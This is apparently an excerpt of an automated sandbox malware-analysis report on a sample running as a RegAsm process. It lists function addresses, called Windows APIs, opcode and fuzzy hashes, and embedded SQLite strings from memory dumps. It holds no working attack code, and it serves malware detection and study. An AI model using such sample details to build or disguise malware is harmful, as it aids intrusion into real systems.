malloc.MSVCRT ref: 0041CB04

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
API String ID: 2974738957-0
Opcode ID: 5dfebefcbd450becf8fd0f7aadb33194184dca7d1d1462ad00b6bca9cc986d8d
Instruction ID: 1d75038c9d6f82751542f8ded51e271c5ae212cca47aec72cb7681773df63792
Opcode Fuzzy Hash: 5dfebefcbd450becf8fd0f7aadb33194184dca7d1d1462ad00b6bca9cc986d8d
Instruction Fuzzy Hash: 69F0F0722492196FC710AF66FC82A9BBB94EF447E0F154026EA08D7341CB34EC41C2E8

Function 004183AB Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee79582b13ac58c07bf9cadea42d5465040b7cafef9751eaf55f321d72a15092
Instruction ID: 9c2ab248887ba4f9c0c41faeb2fd300bc7f8c29823d5ac8eb45cf13983e75499
Opcode Fuzzy Hash: ee79582b13ac58c07bf9cadea42d5465040b7cafef9751eaf55f321d72a15092
Instruction Fuzzy Hash: 31517671911201ABCA717BEE848AAF6B2D16FA0318B14049FF814A6273EF7D5DD04D5D

Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98836bc013c2ba0d7fc6841701af9f096fa0d5f1eb9b976d92b73d7a5702bbcb
Instruction ID: 6f8bfc629784827c4013df9a1d54c42cf0395e69e9351039f0e090671eb5da7a
Opcode Fuzzy Hash: 98836bc013c2ba0d7fc6841701af9f096fa0d5f1eb9b976d92b73d7a5702bbcb
Instruction Fuzzy Hash: 96319E71D0C2149FDB16DF55D8808AEBBB1EF84314B20806BE415B7391D738AE41DF9A

Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 772dee1586718beecfa6431a8569a94c1333991da65c7caee4e9a8963cc295e5
Instruction ID: 6f5bd0e650490c68cf24b57295444a455925872351d23d360de6d6e8eccd5d92
Opcode Fuzzy Hash: 772dee1586718beecfa6431a8569a94c1333991da65c7caee4e9a8963cc295e5
Instruction Fuzzy Hash: A7F03A71E0025DABDB15DF68DC909EEB7FDEB48214F0005BAB909D3281DA349F458B94

Function 61E2A652 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 61E2A66D

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: e26b6afafbe88dd408296985b2cf5437b863de116ceff75567ad09f3e2b45908
Instruction ID: 4040ac9b910eb7d7724dfc403353a0a40a3fe088e4c24dccbd46c39564703f2d
Opcode Fuzzy Hash: e26b6afafbe88dd408296985b2cf5437b863de116ceff75567ad09f3e2b45908
Instruction Fuzzy Hash: C3F0F97180530A9FDB109F55C58195DFBE8EF84268F14C86DE8984B310D374E544CF91

Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3a9f828b4b51f5248f17d6484fd9875d75162c831bb2795b907621225107875e
Instruction ID: 48cefe28e7c16a17f1b3a03bf714cfe81048222a20416ea46e0740dc495815d5
Opcode Fuzzy Hash: 3a9f828b4b51f5248f17d6484fd9875d75162c831bb2795b907621225107875e
Instruction Fuzzy Hash: 90D05E31A001386B8A5057A9FC044EEBB49CB817B5B004263FA5DD61F0C664AC9242C8

Function 00412541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 00412577

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 1cb9768de612831c04726a6610165006ca8fd66eaaacb19e26ded2f060fa152f
Instruction ID: 3dd1c1190fb6dc9c59a8ee3e6055d34d9c75a81d8c6190a6a13d3746f0cd209a
Opcode Fuzzy Hash: 1cb9768de612831c04726a6610165006ca8fd66eaaacb19e26ded2f060fa152f
Instruction Fuzzy Hash: 9EE09AB0D0421E9FCF44EFA8D9156DDBAF4BF08308F00916AC115F7240E3B542058FA9

Function 61E0AE03 Relevance: 1.3, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 61E0AE3D

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
Instruction ID: a929929d55870eb2e3dfc3d9b08de53e37bb6c9da6c43a06ed963554b33c57a4
Opcode Fuzzy Hash: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
Instruction Fuzzy Hash: A5F090B1554708CFDB006FA8E8C52153BA4F746219F5840BAE8150B201D735D5E1CB91

Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00407EB5

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

Function 61E2A6AF Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 61E2A6BF

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
Instruction ID: 08a60fc229ca929b4850671bf03eed3452f9cad2ea52f9bb94d0a5c68b8f0e05
Opcode Fuzzy Hash: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
Instruction Fuzzy Hash: 68F039B0C4830A9FCB009FA5DAC5A0DBBE8EB84258F14C46DE8988F710D334E580CB51

Non-executed Functions

Function 61E4304E Relevance: 31.5, APIs: 1, Strings: 19, Instructions: 1527COMMON

Download Yara Rule

Strings

false, xrefs: 61E43198
ambiguous column name, xrefs: 61E43DC3
Q{a, xrefs: 61E4465A
the "." operator, xrefs: 61E43209
aggregate, xrefs: 61E4434A
new, xrefs: 61E43838
window, xrefs: 61E44351
non-deterministic functions, xrefs: 61E44232
main, xrefs: 61E4331F
no such column, xrefs: 61E43DC8
ROWID, xrefs: 61E43F8E
old, xrefs: 61E4386A
subqueries, xrefs: 61E447D9
true, xrefs: 61E43181
M, xrefs: 61E43A55
za, xrefs: 61E448C1
excluded, xrefs: 61E438A5
parameters, xrefs: 61E4482B
H, xrefs: 61E43766

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: za$H$M$Q{a$ROWID$aggregate$ambiguous column name$excluded$false$main$new$no such column$non-deterministic functions$old$parameters$subqueries$the "." operator$true$window
API String ID: 0-995943838
Opcode ID: 1914081d60248d536b1f958949a14835ff9b7fabe080248d438476012bbdddb4
Instruction ID: 1d323ea87534b4984c39532d96b7a68bc5a2d3eb5612128e3b04e89f7f046be3
Opcode Fuzzy Hash: 1914081d60248d536b1f958949a14835ff9b7fabe080248d438476012bbdddb4
Instruction Fuzzy Hash: 9AF25A74A042658FEB20CF68D980B99BBF1BF49308F24C5DAD8999B391D770E985CF50

Function 61E89E0E Relevance: 21.9, APIs: 1, Strings: 13, Instructions: 889COMMON

Download Yara Rule

Strings

BINARY, xrefs: 61E8AA07
table, xrefs: 61E8A4AE
<va, xrefs: 61E8A6FF
, , xrefs: 61E8A717
view, xrefs: 61E8A4B6
,)?, xrefs: 61E8A70F
TABLE, xrefs: 61E8A4A9
bua, xrefs: 61E89EE8
bua, xrefs: 61E8A704
VIEW, xrefs: 61E8A4A4
sqlite_sequence, xrefs: 61E8A99D
bua, xrefs: 61E89E80
, xrefs: 61E8A722

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: $, $,)?$<va$BINARY$TABLE$VIEW$bua$bua$bua$sqlite_sequence$table$view
API String ID: 0-1924526440
Opcode ID: 43dd563dff4f41a1d6871d8bad28856538ede98fd9c254703a0f03d67f730c41
Instruction ID: 7e928e732a07f98dc879ebd84ab0464052c32152e924ddb65c1e78ed1b741658
Opcode Fuzzy Hash: 43dd563dff4f41a1d6871d8bad28856538ede98fd9c254703a0f03d67f730c41
Instruction Fuzzy Hash: 92824674A45245CFDB44CFA8C18079DBBF1BF88308F25C569E899AB3A5D774E882CB41

Function 61E9E24F Relevance: 17.1, Strings: 13, Instructions: 869COMMON

Download Yara Rule

Strings

bua, xrefs: 61E9E43E
bua, xrefs: 61E9ED4E
content, xrefs: 61E9E6BE, 61E9EC68, 61E9EE3F
idx, xrefs: 61E9EAF7
id INTEGER PRIMARY KEY, sz BLOB, xrefs: 61E9EC9F
id INTEGER PRIMARY KEY, block BLOB, xrefs: 61E9EACC
rowid, xrefs: 61E9E89A, 61E9E993
config, xrefs: 61E9ECC9
data, xrefs: 61E9EAD1
k PRIMARY KEY, v, xrefs: 61E9ECC4
segid, term, pgno, PRIMARY KEY(segid, term), xrefs: 61E9EAF2
version, xrefs: 61E9ECE8
docsize, xrefs: 61E9ECA4, 61E9EE46

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: bua$bua$config$content$data$docsize$id INTEGER PRIMARY KEY, block BLOB$id INTEGER PRIMARY KEY, sz BLOB$idx$k PRIMARY KEY, v$rowid$segid, term, pgno, PRIMARY KEY(segid, term)$version
API String ID: 0-2268357529
Opcode ID: c027d0dd600d488911ade3015ef1b01bc4a252b854e2efd1cea36245f32c4c9b
Instruction ID: f9c2f8dafde392a94833a84278d27f7abaf5337b7a20f26a6dc113648fca896e
Opcode Fuzzy Hash: c027d0dd600d488911ade3015ef1b01bc4a252b854e2efd1cea36245f32c4c9b
Instruction Fuzzy Hash: FE8206B49046499FDB10CFA9C18079DBBF1BF89318F25C92EE894AB395D774D881CB42

Function 61EA2F47 Relevance: 10.3, APIs: 2, Strings: 4, Instructions: 1261COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61EA3821
memcmp.MSVCRT ref: 61EA397C

Strings

content, xrefs: 61EA356B
DELETE from, xrefs: 61EA3C5A
UPDATE, xrefs: 61EA3C5F
docsize, xrefs: 61EA3F81

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: DELETE from$UPDATE$content$docsize
API String ID: 1475443563-2142216780
Opcode ID: a186fdc88e02aea7b3e286e42af257cbee50fc503b30022653864dfd3effc8f4
Instruction ID: 70c6a14bc8af06d6aef6aa9ad5cb9e7fc1cc1a093b7b28355e50790c232760be
Opcode Fuzzy Hash: a186fdc88e02aea7b3e286e42af257cbee50fc503b30022653864dfd3effc8f4
Instruction Fuzzy Hash: ABC2F674A042598FDB10DFA8C980B8DBBF1BF88308F2585A9D849AB345D774ED85CF81

Function 61E88FCA Relevance: 9.6, Strings: 7, Instructions: 866COMMON

Download Yara Rule

Strings

BINARY, xrefs: 61E896A2, 61E89791
bua, xrefs: 61E89A13
UNIQUE, xrefs: 61E899F4
index, xrefs: 61E890AB, 61E89217, 61E893FF
sqlite_master, xrefs: 61E8932D
invalid rootpage, xrefs: 61E89B28
sqlite_temp_master, xrefs: 61E89339

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: UNIQUE$BINARY$bua$index$invalid rootpage$sqlite_master$sqlite_temp_master
API String ID: 0-1733444394
Opcode ID: 942c3252f569534b95223784463c0f2386868140ba366267ab3a4510c1713d75
Instruction ID: c52f25025489653eb610d6e343a086c80a5a7374dd8721026aec1ef0af0b0df4
Opcode Fuzzy Hash: 942c3252f569534b95223784463c0f2386868140ba366267ab3a4510c1713d75
Instruction Fuzzy Hash: 1892F174E08255CFDB51CFA8C580B99BBF1BF89308F65C1A9E859AB352D734E881CB41

Function 61E56F18 Relevance: 9.6, APIs: 5, Strings: 1, Instructions: 606COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E57166

Strings

NEAR, xrefs: 61E57493

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: NEAR
API String ID: 1475443563-1088024997
Opcode ID: 8b567820edb5981adc55974c97c4ab7292800c8f9629d994c9b363bfa805e60a
Instruction ID: b4e98ac7f2dea276e522b18a44adf406a464a3194d3be0cff96e2c83306ccf13
Opcode Fuzzy Hash: 8b567820edb5981adc55974c97c4ab7292800c8f9629d994c9b363bfa805e60a
